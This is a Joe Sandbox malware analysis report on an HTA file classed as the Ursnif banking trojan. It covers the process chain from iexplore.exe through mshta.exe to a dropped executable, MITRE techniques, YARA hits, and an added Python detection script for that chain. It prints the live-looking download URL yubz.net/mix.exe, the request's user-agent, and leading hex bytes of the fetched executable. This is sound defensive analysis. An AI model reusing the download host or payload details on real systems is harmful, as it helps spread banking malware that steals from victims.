
Analysis Report dokument11900326.hta

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 218146
Start date: 26.03.2020
Start time: 09:45:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 57s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: dokument11900326.hta
Cookbook file name: defaultwindowshtmlcookbook.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.bank.troj.evad.winHTA@14/40@2/1
EGA Information:
  • Successful, ratio: 33.3%
HDC Information:
  • Successful, ratio: 1.6% (good quality ratio 1.6%)
  • Quality average: 88.3%
  • Quality standard deviation: 19.3%
HCA Information:
  • Successful, ratio: 56%
  • Number of executed functions: 75
  • Number of non-executed functions: 93
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .hta
Warnings:
  • Excluded processes from analysis (whitelisted): ielowutil.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 172.227.102.35, 8.248.113.254, 8.253.204.120, 67.27.159.254, 8.253.95.120, 67.27.233.126, 67.27.233.254, 67.27.235.126, 8.248.121.254, 2.18.68.82, 51.104.136.2, 152.199.19.161, 23.203.70.175, 40.127.240.158, 51.124.78.146
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ie9comview.vo.msecnd.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, settingsfd-geo.trafficmanager.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, go.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 5572 because there are no executed functions
  • Execution Graph export aborted for target mshta.exe, PID 6020 because there are no executed functions
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 76 (range 0 - 100)
Whitelisted: false
Threat: Ursnif
Detection: malicious

Confidence

Strategy: Threshold
Score: 5 (range 0 - 5)
Further Analysis Required?: false


Classification Spiderchart

Mitre Att&ck Matrix

Techniques with at least one signature hit, listed per tactic. The digits in parentheses are the hit markers carried over from the report's matrix (the report renders one marker per matching signature). The rest of the matrix is the fixed technique grid with no hits and is omitted here.

Initial Access: none
Execution: Windows Management Instrumentation (2), Execution through API (3), Exploitation for Client Execution (1), Graphical User Interface (1)
Persistence: none
Privilege Escalation: Process Injection (12)
Defense Evasion: Software Packing (21), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Masquerading (1), Virtualization/Sandbox Evasion (1), Process Injection (12)
Credential Access: none
Discovery: System Time Discovery (1), Account Discovery (1), Security Software Discovery (31), File and Directory Discovery (2), System Information Discovery (25), Virtualization/Sandbox Evasion (1), Process Discovery (1), Application Window Discovery (1), System Owner/User Discovery (1), Remote System Discovery (1)
Lateral Movement: Remote File Copy (11)
Collection: Email Collection (1)
Exfiltration: Data Encrypted (1)
Command and Control: Remote File Copy (11), Standard Cryptographic Protocol (1), Standard Non-Application Layer Protocol (2), Standard Application Layer Protocol (12)
Network Effects: none
Remote Service Effects: none
Impact: none

Signature Overview



AV Detection:

Antivirus or Machine Learning detection for unpacked file
Source: 4.2.ZwlegcGh.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00535632 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree

Software Vulnerabilities:

Potential browser exploit detected (process start blacklist hit)
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Windows\SysWOW64\mshta.exe

Networking:

Creates a COM Internet Explorer object
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Downloads executable code via HTTP
Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Date: Thu, 26 Mar 2020 08:46:30 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2020 08:46:11 GMT
ETag: "bdc00-5a1be044b0183"
Accept-Ranges: bytes
Content-Length: 777216
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 f8 c3 87 b5 99 ad d4 b5 99 ad d4 b5 99 ad d4 bc e1 2e d4 b2 99 ad d4 ab cb 38 d4 af 99 ad d4 ab cb 2e d4 05 99 ad d4 ab cb 29 d4 0c 99 ad d4 bc e1 3e d4 a0 99 ad d4 b5 99 ac d4 68 9b ad d4 bc e1 27 d4 b4 99 ad d4 bc e1 39 d4 b4 99 ad d4 bc e1 3c d4 b4 99 ad d4 52 69 63 68 b5 99 ad d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c5 09 ca 49 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 02 07 00 00 d6 04 00 00 00 00 00 a0 df 02 00 00 10 00 00 00 20 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 0d 00 00 04 00 00 0f 0e 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 6d 09 00 b4 00 00 00 00 d0 0b 00 6c da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 26 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 33 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 cc 04 00 00 10 6d 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 71 01 07 00 00 10 00 00 00 02 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 52 67 02 00 00 20 07 00 00 68 02 00 00 06 07 00 00 00 00 00 00 00 00 
00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 3b 02 00 00 90 09 00 00 92 00 00 00 6e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 6c da 01 00 00 d0 0b 00 00 dc 01 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected (second fetch of the same file):
HTTP/1.1 200 OK
Date: Thu, 26 Mar 2020 08:46:47 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2020 08:46:11 GMT
ETag: "bdc00-5a1be044b0183"
Accept-Ranges: bytes
Content-Length: 777216
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: identical to the response above (same ETag, same Content-Length, same leading bytes)
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /mix.exe HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Language: en-us | User-Agent: mbKAtgJpDNErZbdadVkioVfOPUTSsLICwIDYyzNVLRrHwV | Host: yubz.net
Source: global traffic | HTTP traffic detected: GET /mix.exe HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Language: en-us | User-Agent: mbKAtgJpDNErZbdadVkioVfOPUTSsLICwIDYyzNVLRrHwV | Host: yubz.net
Found strings which match to known social media urls
Source: msapplication.xml0.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4557761c,0x01d6034b</date><accdate>0x4557761c,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4557761c,0x01d6034b</date><accdate>0x4559eb9a,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x456184d3,0x01d6034b</date><accdate>0x456184d3,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x456184d3,0x01d6034b</date><accdate>0x456184d3,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x45640d5e,0x01d6034b</date><accdate>0x45640d5e,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x45640d5e,0x01d6034b</date><accdate>0x45640d5e,0x01d6034b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: yubz.net
Urls found in memory or binary data
Source: imagestore.dat.9.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
Source: msapplication.xml.7.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.7.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.7.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.7.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.7.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.7.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.7.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.7.dr | String found in binary or memory: http://www.youtube.com/
Source: mshta.exe, 00000005.00000003.1138032623.0000000007053000.00000004.00000001.sdmp | String found in binary or memory: http://yubz.net/
Source: mshta.exe, 00000005.00000003.1139887996.00000000034F5000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.1138032623.0000000007053000.00000004.00000001.sdmp | String found in binary or memory: http://yubz.net/mix.exe
Source: mshta.exe, 00000005.00000003.1139887996.00000000034F5000.00000004.00000001.sdmp | String found in binary or memory: http://yubz.net/mix.exe0:?
Source: mshta.exe, 00000003.00000003.1092669500.0000000002EEC000.00000004.00000001.sdmp | String found in binary or memory: http://yubz.net/mix.exe2
Source: mshta.exe, 00000005.00000003.1143682189.0000000006604000.00000004.00000001.sdmp | String found in binary or memory: http://yubz.net/mix.exe7
Source: mshta.exe, 00000005.00000003.1139887996.00000000034F5000.00000004.00000001.sdmp | String found in binary or memory: http://yubz.net/mix.exe?/
Source: mshta.exe, 00000003.00000003.1092669500.0000000002EEC000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.1087276441.00000000061C2000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.1084914589.0000000002F04000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.1142675688.0000000006622000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.1139887996.00000000034F5000.00000004.00000001.sdmp | String found in binary or memory: https://abby.com
Source: mshta.exe, 00000003.00000003.1084914589.0000000002F04000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.1141047489.00000000034AD000.00000004.00000001.sdmp | String found in binary or memory: https://abby.com/
Source: mshta.exe, 00000005.00000003.1143682189.0000000006604000.00000004.00000001.sdmp | String found in binary or memory: https://abby.comd
Source: imagestore.dat.9.dr | String found in binary or memory: https://www.msn.com/content/images/icons/Favicon_EdgeStart.ico
Source: imagestore.dat.9.dr | String found in binary or memory: https://www.msn.com/content/images/icons/Favicon_EdgeStart.ico~

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1304396728.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304302273.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304478289.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1303998727.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1303649085.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304166714.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304588205.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1304552900.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ZwlegcGh.exe PID: 924, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | the same eight ZwlegcGh.exe (PID 924) memory dumps at 0x31F8000 and the process memory space listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above

System Summary:

Writes or reads registry keys via WMI
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00401360 GetProcAddress,NtCreateSection,memset
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_004020BE NtMapViewOfSection
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00533DCC LdrInitializeThunk,NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_0041F810
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00451880
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_0043CA30
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_0043BC50
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_0053A96C
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_00534317
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: 4_2_005361CC
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Code function: String function: 00437E20 appears 37 times
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE (2 occurrences)
Classification label
Source: classification engine | Classification label: mal76.bank.troj.evad.winHTA@14/40@2/1
Creates files inside the user directory
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3DF24A3B-6F3E-11EA-AAE6-9CC1A2A860C6}.dat
Creates temporary files
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\~DFA6B85340EA66D50E.TMP
Reads ini files
Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 occurrences)
Spawns processes
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3476 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\Desktop\dokument11900326.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}file:///C:/Users/user/Desktop/dokument11900326.hta{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4272 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4900 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3476 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\Desktop\dokument11900326.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}file:///C:/Users/user/Desktop/dokument11900326.hta{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4272 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4900 CREDAT:17410 /prefetch:2
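The process tree above (iexplore.exe starting mshta.exe on the .hta from the Desktop, that mshta.exe starting the dropped ZwlegcGh.exe from %LOCALAPPDATA%\Temp) and the GET /mix.exe request with its random alphabetic User-Agent are the observable choke points of this chain. The following Python is an added example of detection logic over those observations, not part of the Joe Sandbox report. The event records are constructed from the report's own lines; the record fields, the parent/child PIDs other than ZwlegcGh.exe (924), and the two benign control records are assumptions.

```python
"""Detection logic for the mshta.exe dropper chain recorded in this report.

Added example, not part of the Joe Sandbox report. The records below are
constructed from the report's "Spawns processes" and "HTTP traffic detected"
lines; the field layout and all PIDs except ZwlegcGh.exe (924) are assumptions,
and the records marked benign are invented controls.
"""
import re
from dataclasses import dataclass

# Directories an unprivileged user can write to: a payload staged here is the usual tell.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata\\local\\temp|desktop|downloads)\\", re.I)
# Parents that have no business launching mshta.exe.
SUSPICIOUS_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "winword.exe", "excel.exe", "outlook.exe"}
# One long run of letters with no product/version structure, as in the report's request.
RANDOM_UA = re.compile(r"^[A-Za-z]{20,}$")
# A Windows path ending in .hta, possibly quoted, possibly containing spaces.
HTA_PATH = re.compile(r"([A-Za-z]:\\[^'\"]*?\.hta)", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str


@dataclass
class HttpExchange:
    method: str
    host: str
    path: str
    user_agent: str
    content_type: str   # of the response
    body_prefix: bytes  # first bytes of the response body


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


PROC_EVENTS = [
    ProcEvent(3476, 1000, r"C:\Windows\explorer.exe", r"C:\Program Files\internet explorer\iexplore.exe",
              r"'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding"),
    ProcEvent(5572, 3476, r"C:\Program Files\internet explorer\iexplore.exe", r"C:\Windows\SysWOW64\mshta.exe",
              r"'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\Desktop\dokument11900326.hta' "
              r"{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}file:///C:/Users/user/Desktop/dokument11900326.hta"),
    ProcEvent(924, 5572, r"C:\Windows\SysWOW64\mshta.exe", r"C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe",
              r"C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe"),
    # benign control (constructed): a product help page opened from Explorer
    ProcEvent(7001, 1000, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe 'C:\Program Files\Vendor\help.hta'"),
]

HTTP_EXCHANGES = [
    HttpExchange("GET", "yubz.net", "/mix.exe", "mbKAtgJpDNErZbdadVkioVfOPUTSsLICwIDYyzNVLRrHwV",
                 "application/x-msdownload", bytes.fromhex("4d5a90000300")),
    # benign control (constructed)
    HttpExchange("GET", "example.invalid", "/index.html", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Trident/7.0",
                 "text/html", b"<!DOCTYPE html>"),
]


def flag_process(e: ProcEvent) -> list:
    """Per-event rules; returns the names of the rules that fired."""
    reasons = []
    if basename(e.image) == "mshta.exe":
        if basename(e.parent_image) in SUSPICIOUS_PARENTS:
            reasons.append("mshta_from_browser_or_office")
        m = HTA_PATH.search(e.cmdline)
        if m and USER_WRITABLE.search(m.group(1)):
            reasons.append("hta_in_user_writable_dir")
    if basename(e.parent_image) == "mshta.exe" and USER_WRITABLE.search(e.image):
        reasons.append("mshta_spawned_binary_from_user_writable_dir")
    return reasons


def hta_drop_chains(events) -> list:
    """Correlate across events: an mshta.exe launched on an .hta whose child is a
    binary in a user-writable directory. Returns (hta path, child image) pairs."""
    by_pid = {e.pid: e for e in events}
    chains = []
    for e in events:
        if "mshta_spawned_binary_from_user_writable_dir" not in flag_process(e):
            continue
        parent = by_pid.get(e.ppid)
        m = HTA_PATH.search(parent.cmdline) if parent else None
        if m:
            chains.append((m.group(1), e.image))
    return chains


def flag_http(x: HttpExchange) -> list:
    """Network-side indicators of the same download, independent of the host name."""
    reasons = []
    if RANDOM_UA.match(x.user_agent):
        reasons.append("random_alpha_user_agent")
    if x.body_prefix.startswith(b"MZ"):
        reasons.append("pe_in_response_body")
    if x.content_type == "application/x-msdownload":
        reasons.append("x-msdownload")
    if x.path.lower().endswith(".exe"):
        reasons.append("exe_path")
    return reasons


if __name__ == "__main__":
    for ev in PROC_EVENTS:
        print(ev.pid, basename(ev.image), flag_process(ev))
    print("chains:", hta_drop_chains(PROC_EVENTS))
    for ex in HTTP_EXCHANGES:
        print(ex.host, ex.path, flag_http(ex))
```

The per-event rules are what a Sysmon/EDR process-creation query would express; the chain correlation is the higher-confidence signal, since an .hta in a user-writable directory that leads to a fresh binary in %TEMP% is exactly the sequence the report records, while either half alone (mshta from a browser, or a binary run from Temp) has benign occurrences. The User-Agent rule keys on structure rather than the specific string, so it survives the per-build randomisation Joe Sandbox captured here.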
Uses an in-process (OLE) Automation server
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Reads internet explorer settings
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: c:\writemeet\LaughEast\BreadWall\shinegovern\Boughtpoem\PicturePointfill.pdb | source: mshta.exe, 00000003.00000003.1082299238.0000000006F71000.00000004.00000001.sdmp, ZwlegcGh.exe, 00000004.00000002.1552905765.0000000000472000.00000002.00020000.sdmp, mshta.exe, 00000005.00000003.1138297303.0000000007311000.00000004.00000001.sdmp, ZwlegcGh.exe.3.dr

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Unpacked PE file: 4.2.ZwlegcGh.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe | Unpacked PE file: 4.2.ZwlegcGh.exe.400000.1.unpack
Contains functionality to dynamically determine API calls
